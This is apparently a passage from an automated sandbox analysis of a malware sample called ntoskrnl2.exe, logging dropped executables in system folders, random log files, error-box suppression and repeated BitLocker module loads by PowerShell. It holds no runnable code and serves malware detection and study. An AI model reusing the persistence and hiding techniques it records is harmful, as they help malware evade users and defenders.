                    Source: unknownExecutable created and started: C:\Windows\Containers\GFIYCbjKVID.exe
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\olnMZMXE.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Migration\WTR\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\fscFeKAz.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Containers\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Recovery\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\dxIWpAcW.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\clfwIsGE.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\PLA\Templates\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\NgAzKpfk.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\NewzHbtF.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Migration\WTR\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Containers\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\PLA\Templates\GFIYCbjKVID.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\clfwIsGE.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\fscFeKAz.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\NgAzKpfk.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\NewzHbtF.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\olnMZMXE.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\dxIWpAcW.logJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
